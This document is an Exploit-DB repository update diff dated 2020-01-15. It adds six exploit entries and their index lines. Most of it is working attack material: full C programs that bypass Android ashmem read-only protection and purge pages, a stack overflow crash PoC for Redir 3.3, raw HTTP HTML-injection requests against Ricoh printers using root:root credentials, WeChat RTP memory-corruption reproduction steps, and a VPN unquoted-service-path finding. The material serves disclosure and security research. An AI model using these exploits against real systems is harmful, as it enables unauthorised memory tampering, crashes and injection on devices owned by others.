DB: 2020-01-15

6 changes to exploits/shellcodes

Redir 3.3 - Denial of Service (PoC)
WeChat - Memory Corruption in CAudioJBM::InputAudioFrameToJBM
Android - ashmem Readonly Bypasses via remap_file_pages() and ASHMEM_UNPIN

VPN unlimited 6.1 - Unquoted Service Path
IBM RICOH InfoPrint 6500 Printer - HTML Injection
IBM RICOH 6400 Printer - HTML Injection

exploits/android/dos/47920.txt

@@ -0,0 +1,24 @@
+There is a memory corruption vulnerability in audio processing during a voice call in WeChat. When an RTP packet is processed, there is a call to UnpacketRTP. This function decrements the length of the packet by 12 without checking that the packet has at least 12 bytes in it. This leads to a negative packet length. Then, CAudioJBM::InputAudioFrameToJBM will check that the packet size is smaller than the size of a buffer before calling memcpy, but this check (n < 300) does not consider that the packet length could be negative due to the previous error. This leads to an out-of-bounds copy.
+
+To reproduce the bug:
+
+1) install and run frida on the caller Android device and a desktop host (https://www.frida.re)
+2) copy the filed in the attached directory to /data/local/tmp/packs/, so that /data/local/tmp/packs/opack0 exists
+3) run "setenforce 0" on the caller device
+4) extract replay.py and replay.js into the same directory on a desktop host and run:
+
+python3 replay.py DEVICENAME
+
+Wait for the word "READY" to display.
+
+If you don't know your device name, you can list device names by running:
+
+python3 replay.py
+
+5) start a voice call and answer it on the target device. A crash will occur in about 10 seconds.
+
+A crash log is attached.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47920.zip

exploits/android/dos/47921.txt

@@ -0,0 +1,250 @@
+This bug report describes two ways in which an attacker can modify the contents
+of a read-only ashmem fd. I'm not sure at this point what the most interesting
+user of ashmem is in the current Android release, but there are various users,
+including Chrome and a bunch of utility classes.
+In AOSP master, there is even code in
+<https://android.googlesource.com/platform/art/+/master/runtime/jit/jit_memory_region.cc>
+that uses ashmem for some JIT zygote mapping, which sounds extremely
+interesting.
+
+
+Android's ashmem kernel driver has an ->mmap() handler that attempts to lock
+down created VMAs based on a configured protection mask such that in particular
+write access to the underlying shmem file can never be gained. It tries to do
+this as follows (code taken from upstream Linux
+drivers/staging/android/ashmem.c):
+
+    static inline vm_flags_t calc_vm_may_flags(unsigned long prot)
+    {
+            return _calc_vm_trans(prot, PROT_READ,  VM_MAYREAD) |
+                   _calc_vm_trans(prot, PROT_WRITE, VM_MAYWRITE) |
+                   _calc_vm_trans(prot, PROT_EXEC,  VM_MAYEXEC);
+    }
+    [...]
+    static int ashmem_mmap(struct file *file, struct vm_area_struct *vma)
+    {
+            struct ashmem_area *asma = file->private_data;
+    [...]
+            /* requested protection bits must match our allowed protection mask */
+            if ((vma->vm_flags & ~calc_vm_prot_bits(asma->prot_mask, 0)) &
+                calc_vm_prot_bits(PROT_MASK, 0)) {
+                    ret = -EPERM;
+                    goto out;
+            }
+            vma->vm_flags &= ~calc_vm_may_flags(~asma->prot_mask);
+    [...]
+            if (vma->vm_file)
+                    fput(vma->vm_file);
+            vma->vm_file = asma->file;
+    [...]
+            return ret;
+    }
+
+This ensures that the protection flags specified by the caller don't conflict
+with the ->prot_mask, and it also clears the VM_MAY* flags as needed to prevent
+the user from afterwards adding new protection flags via mprotect().
+
+However, it improperly stores the backing shmem file, whose ->mmap() handler
+does not enforce the same restrictions, in ->vm_file. An attacker can abuse this
+through the remap_file_pages() syscall, which grabs the file pointer of an
+existing VMA and calls its ->mmap() handler to create a new VMA. In effect,
+calling remap_file_pages(addr, size, 0, 0, 0) on an ashmem mapping allows an
+attacker to raise the VM_MAYWRITE bit, allowing the attacker to gain write
+access to the ashmem allocation's backing file via mprotect().
+
+
+Reproducer (works both on Linux from upstream master in an X86 VM and on a
+Pixel 2 at security patch level 2019-09-05 via adb):
+
+====================================================================
+user@vm:~/ashmem_remap$ cat ashmem_remap_victim.c
+#include <unistd.h>
+#include <stdlib.h>
+#include <fcntl.h>
+#include <err.h>
+#include <stdio.h>
+#include <sys/mman.h>
+#include <sys/ioctl.h>
+#include <sys/wait.h>
+
+#define __ASHMEMIOC   0x77
+#define ASHMEM_SET_SIZE   _IOW(__ASHMEMIOC, 3, size_t)
+#define ASHMEM_SET_PROT_MASK  _IOW(__ASHMEMIOC, 5, unsigned long)
+
+int main(void) {
+  int ashmem_fd = open("/dev/ashmem", O_RDWR);
+  if (ashmem_fd == -1)
+    err(1, "open ashmem");
+  if (ioctl(ashmem_fd, ASHMEM_SET_SIZE, 0x1000))
+    err(1, "ASHMEM_SET_SIZE");
+  char *mapping = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, ashmem_fd, 0);
+  if (mapping == MAP_FAILED)
+    err(1, "mmap ashmem");
+  if (ioctl(ashmem_fd, ASHMEM_SET_PROT_MASK, PROT_READ))
+    err(1, "ASHMEM_SET_SIZE");
+  mapping[0] = 'A';
+  printf("mapping[0] = '%c'\n", mapping[0]);
+
+  if (dup2(ashmem_fd, 42) != 42)
+    err(1, "dup2");
+  pid_t child = fork();
+  if (child == -1)
+    err(1, "fork");
+  if (child == 0) {
+    execl("./ashmem_remap_attacker", "ashmem_remap_attacker", NULL);
+    err(1, "execl");
+  }
+  int status;
+  if (wait(&status) != child) err(1, "wait");
+  printf("mapping[0] = '%c'\n", mapping[0]);
+}user@vm:~/ashmem_remap$ cat ashmem_remap_attacker.c
+#define _GNU_SOURCE
+#include <unistd.h>
+#include <sys/mman.h>
+#include <err.h>
+#include <stdlib.h>
+#include <stdio.h>
+
+int main(void) {
+  int ashmem_fd = 42;
+
+  /* sanity check */
+  char *write_mapping = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, ashmem_fd, 0);
+  if (write_mapping == MAP_FAILED) {
+    perror("mmap ashmem writable failed as expected");
+  } else {
+    errx(1, "trivial mmap ashmem writable worked???");
+  }
+
+  char *mapping = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, ashmem_fd, 0);
+  if (mapping == MAP_FAILED)
+    err(1, "mmap ashmem readonly failed");
+
+  if (mprotect(mapping, 0x1000, PROT_READ|PROT_WRITE) == 0)
+    errx(1, "mprotect ashmem writable worked???");
+
+  if (remap_file_pages(mapping, /*size=*/0x1000, /*prot=*/0, /*pgoff=*/0, /*flags=*/0))
+    err(1, "remap_file_pages");
+
+  if (mprotect(mapping, 0x1000, PROT_READ|PROT_WRITE))
+    err(1, "mprotect ashmem writable failed, attack didn't work");
+
+  mapping[0] = 'X';
+
+  puts("attacker exiting");
+}user@vm:~/ashmem_remap$ gcc -o ashmem_remap_victim ashmem_remap_victim.c
+user@vm:~/ashmem_remap$ gcc -o ashmem_remap_attacker ashmem_remap_attacker.c
+user@vm:~/ashmem_remap$ ./ashmem_remap_victim
+mapping[0] = 'A'
+mmap ashmem writable failed as expected: Operation not permitted
+attacker exiting
+mapping[0] = 'X'
+user@vm:~/ashmem_remap$ 
+====================================================================
+
+Interestingly, the (very much deprecated) syscall remap_file_pages() isn't even
+listed in bionic's SYSCALLS.txt, which would normally cause it to be blocked by
+Android's seccomp policy; however, SECCOMP_WHITELIST_APP.txt explicitly permits
+it for 32-bit ARM applications:
+
+    # b/36435222
+    int remap_file_pages(void *addr, size_t size, int prot, size_t pgoff, int flags)  arm,x86,mips
+
+
+
+
+ashmem supports purgable memory via ASHMEM_UNPIN/ASHMEM_PIN. Unfortunately,
+there is no access control for these - even if you only have read-only access to
+an ashmem file, you can still mark pages in it as purgable, causing them to
+effectively be zeroed out when the system is under memory pressure. Here's a
+simple test for that (to be run in an X86 Linux VM):
+
+====================================================================
+user@vm:~/ashmem_purging$ cat ashmem_purge_victim.c
+#include <unistd.h>
+#include <stdlib.h>
+#include <fcntl.h>
+#include <err.h>
+#include <stdio.h>
+#include <sys/mman.h>
+#include <sys/ioctl.h>
+#include <sys/wait.h>
+
+#define __ASHMEMIOC   0x77
+#define ASHMEM_SET_SIZE   _IOW(__ASHMEMIOC, 3, size_t)
+#define ASHMEM_SET_PROT_MASK  _IOW(__ASHMEMIOC, 5, unsigned long)
+
+int main(void) {
+  int ashmem_fd = open("/dev/ashmem", O_RDWR);
+  if (ashmem_fd == -1)
+    err(1, "open ashmem");
+  if (ioctl(ashmem_fd, ASHMEM_SET_SIZE, 0x1000))
+    err(1, "ASHMEM_SET_SIZE");
+  char *mapping = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, ashmem_fd, 0);
+  if (mapping == MAP_FAILED)
+    err(1, "mmap ashmem");
+  if (ioctl(ashmem_fd, ASHMEM_SET_PROT_MASK, PROT_READ))
+    err(1, "ASHMEM_SET_SIZE");
+  mapping[0] = 'A';
+  printf("mapping[0] = '%c'\n", mapping[0]);
+
+  if (dup2(ashmem_fd, 42) != 42)
+    err(1, "dup2");
+  pid_t child = fork();
+  if (child == -1)
+    err(1, "fork");
+  if (child == 0) {
+    execl("./ashmem_purge_attacker", "ashmem_purge_attacker", NULL);
+    err(1, "execl");
+  }
+  int status;
+  if (wait(&status) != child) err(1, "wait");
+  printf("mapping[0] = '%c'\n", mapping[0]);
+}
+user@vm:~/ashmem_purging$ cat ashmem_purge_attacker.c
+#include <unistd.h>
+#include <stdlib.h>
+#include <fcntl.h>
+#include <err.h>
+#include <stdio.h>
+#include <sys/mman.h>
+#include <sys/ioctl.h>
+
+struct ashmem_pin {
+  unsigned int offset, len;
+};
+
+#define __ASHMEMIOC   0x77
+#define ASHMEM_SET_SIZE   _IOW(__ASHMEMIOC, 3, size_t)
+#define ASHMEM_UNPIN    _IOW(__ASHMEMIOC, 8, struct ashmem_pin)
+
+int main(void) {
+  struct ashmem_pin pin = { 0, 0 };
+  if (ioctl(42, ASHMEM_UNPIN, &pin))
+    err(1, "unpin 42");
+
+  /* ensure that shrinker doesn't get skipped */
+  int ashmem_fd = open("/dev/ashmem", O_RDWR);
+  if (ashmem_fd == -1)
+    err(1, "open ashmem");
+  if (ioctl(ashmem_fd, ASHMEM_SET_SIZE, 0x100000))
+    err(1, "ASHMEM_SET_SIZE");
+  char *mapping = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, ashmem_fd, 0);
+  if (mapping == MAP_FAILED)
+    err(1, "mmap ashmem");
+  if (ioctl(ashmem_fd, ASHMEM_UNPIN, &pin))
+    err(1, "unpin 42");
+
+  /* simulate OOM */
+  system("sudo sh -c 'echo 2 > /proc/sys/vm/drop_caches'");
+
+  puts("attacker exiting");
+}
+user@vm:~/ashmem_purging$ gcc -o ashmem_purge_victim ashmem_purge_victim.c
+user@vm:~/ashmem_purging$ gcc -o ashmem_purge_attacker ashmem_purge_attacker.c
+user@vm:~/ashmem_purging$ ./ashmem_purge_victim
+mapping[0] = 'A'
+attacker exiting
+mapping[0] = ''
+user@vm:~/ashmem_purging$ 
+====================================================================

exploits/hardware/webapps/47917.txt

@@ -0,0 +1,37 @@
+# Exploit Title: IBM RICOH InfoPrint 6500 Printer - HTML Injection
+# Date: 2020-01-02 
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://www.ibm.com/il-en
+# Hardware Link: http://www-01.ibm.com/common/ssi/cgi-bin/ssialias?infotype=AN&subtype=CA&htmlfid=897/ENUS105-214
+# Firmware Version: 1.4.40.10
+# Vulernability Type: Code Injection
+# Vulenrability: HTML Injection
+# CVE: N/A
+
+# Description :
+# Ricoh InfoPrint 6500 devices allow /config?destConf.html
+# HTML Injection by authenticated users, as demonstrated by the 166 parameter.
+
+HTTP Request :
+
+POST /config?destConf.html HTTP/1.1
+Host: SERVER
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 81
+Origin: SERVER
+Authorization: Basic cm9vdDpyb290
+Connection: close
+Referer: http://SERVER/config?destConf.html
+Upgrade-Insecure-Requests: 1
+
+166=%22%3E%3Ch1%3EIsmail+Tasdelen&182=1&230=1&198=1&190=1&222=1&238=1&270=0&486=0
+
+HTTP Response :
+
+HTTP/1.0 200 OK
+Server: Microplex emHTTPD/1.0
+Content-Type: text/html

exploits/hardware/webapps/47918.txt

@@ -0,0 +1,37 @@
+# Exploit Title: IBM RICOH 6400 Printer - HTML Injection
+# Date: 2020-01-02 
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://www.ibm.com/il-en
+# Hardware Link: https://www-01.ibm.com/common/ssi/cgi-bin/ssialias?infotype=AN&subtype=CA&htmlfid=649/ENUSA02-1405&appname=USN
+# Firmware Version: 1.1.26.3
+# Vulernability Type: Code Injection
+# Vulenrability: HTML Injection
+# CVE: N/A
+
+# Description :
+# Ricoh InfoPrint 6400 devices allow /config?logpathConf.html
+# HTML Injection by authenticated users, as demonstrated by the 420 parameter.
+
+HTTP Request :
+
+POST /config?logpathConf.html HTTP/1.1
+Host: SERVER
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 54
+Origin: SERVER
+Authorization: Basic cm9vdDpyb290
+Connection: close
+Referer: http://SERVER/config?logpathConf.html
+Upgrade-Insecure-Requests: 1
+
+428=&420=%22%3E%3Cmarquee%3EIsmail+Tasdelen&548=5&564=
+
+HTTP Response :
+
+HTTP/1.0 200 OK
+Server: Microplex emHTTPD/1.0
+Content-Type: text/html

exploits/linux/dos/47919.txt

@@ -0,0 +1,58 @@
+# Exploit Title: Redir 3.3 - Denial of Service (PoC)
+# Date: 2020-01-14
+# Exploit Author: hieubl from HPT Cyber Security
+# Vendor Homepage: https://github.com/troglobit/redir
+# Software Link: https://github.com/troglobit/redir
+# Version: 3.3
+# Tested on: Kali GNU/Linux Rolling 2019.4
+# CVE : [if applicable]
+
+The source code of redir.c contains doproxyconnect() function which
+has the stack overflow vulnerability:
+
+void doproxyconnect(int socket)
+{
+	int x;
+	char buf[128];
+
+	/* write CONNECT string to proxy */
+	sprintf((char *)&buf, "CONNECT %s HTTP/1.0\n\n", connect_str);
+	x = write(socket, (char *)&buf, strlen(buf));
+	if (x < 1) {
+		syslog(LOG_ERR, "Failed writing to proxy: %s", strerror(errno));
+		exit(1);
+	}
+	/* now read result */
+	x = read(socket, (char *)&buf, sizeof(buf));
+	if (x < 1) {
+		syslog(LOG_ERR, "Failed reading reply from proxy: %s", strerror(errno));
+		exit(1);
+	}
+	/* no more error checking for now -- something should be added later */
+	/* HTTP/1.0 200 Connection established */
+}
+
+Download and build:
+# git clone https://github.com/troglobit/redir.git
+# cd redir
+# ./autogen.sh
+# ./configure
+# make
+
+Proof of Concept:
+  In 1st terminal:
+    # gdb -q ./redir
+    # set follow-fork-mode child
+    # r -x AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+:1234 hpt.vn:80
+
+  In 2nd terminal:
+    # nc localhost 1234
+
+  After that, the program in 1st terminal will crash because of buffer
+overflow vulnerability.
+    ...
+    ► 0x5555555571b0 <doproxyconnect+144>    ret    <0x4141414141414141>
+    ...
+    Program received signal SIGSEGV (fault address 0x0)
+    pwndbg>

exploits/windows/local/47916.txt

@@ -0,0 +1,21 @@
+# Exploit Title: VPN unlimited 6.1 - Unquoted Service Path
+# Date: 2020-1-13
+# Exploit Author: Amin Rawah
+# Vendor Homepage: https://www.vpnunlimitedapp.com
+# Version: 6.1
+# Tested on: Windows 10 64bit
+
+C:\Users\Amin>sc qc VPNUnlimitedService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: VPNUnlimitedService
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\VPN
+Unlimited\vpn-unlimited-daemon.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : VPN Unlimited Service
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem

files_exploits.csv

@@ -6654,6 +6654,9 @@ id,file,description,date,author,type,platform,port
 47909,exploits/windows/dos/47909.py,"Backup Key Recovery 2.2.5 - 'Name' Denial of Service (PoC)",2020-01-13,"Ismail Tasdelen",dos,windows,
 47911,exploits/windows/dos/47911.py,"TaskCanvas 1.4.0 - 'Registration' Denial Of Service",2020-01-13,"Ismail Tasdelen",dos,windows,
 47912,exploits/windows/dos/47912.py,"Top Password Firefox Password Recovery 2.8 - Denial of Service (PoC)",2020-01-13,antonio,dos,windows,
+47919,exploits/linux/dos/47919.txt,"Redir 3.3 - Denial of Service (PoC)",2020-01-14,hieubl,dos,linux,
+47920,exploits/android/dos/47920.txt,"WeChat - Memory Corruption in CAudioJBM::InputAudioFrameToJBM",2020-01-14,"Google Security Research",dos,android,
+47921,exploits/android/dos/47921.txt,"Android - ashmem Readonly Bypasses via remap_file_pages() and ASHMEM_UNPIN",2020-01-14,"Google Security Research",dos,android,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10898,6 +10901,7 @@ id,file,description,date,author,type,platform,port
 47908,exploits/windows/local/47908.py,"Allok Video Converter 4.6.1217 - Stack Overflow (SEH)",2020-01-13,antonio,local,windows,
 47910,exploits/windows/local/47910.py,"Allok RM RMVB to AVI MPEG DVD Converter 3.6.1217 - Stack Overflow (SEH)",2020-01-13,antonio,local,windows,
 47915,exploits/windows/local/47915.py,"Microsoft Windows 10 build 1809 - Local Privilege Escalation (UAC Bypass)",2020-01-13,"Nassim Asrir",local,windows,
+47916,exploits/windows/local/47916.txt,"VPN unlimited 6.1 - Unquoted Service Path",2020-01-14,"Amin Rawah",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42216,3 +42220,5 @@ id,file,description,date,author,type,platform,port
 47903,exploits/php/webapps/47903.py,"Chevereto 3.13.4 Core - Remote Code Execution",2020-01-13,"Jinny Ramsmark",webapps,php,
 47913,exploits/multiple/webapps/47913.rb,"Citrix Application Delivery Controller and Gateway 10.5 - Remote Code Execution (Metasploit)",2020-01-13,mekhalleh,webapps,multiple,
 47914,exploits/php/webapps/47914.txt,"Digi AnywhereUSB 14 - Reflective Cross-Site Scripting",2020-01-13,"Raspina Net Pars Group",webapps,php,
+47917,exploits/hardware/webapps/47917.txt,"IBM RICOH InfoPrint 6500 Printer - HTML Injection",2020-01-14,"Ismail Tasdelen",webapps,hardware,
+47918,exploits/hardware/webapps/47918.txt,"IBM RICOH 6400 Printer - HTML Injection",2020-01-14,"Ismail Tasdelen",webapps,hardware,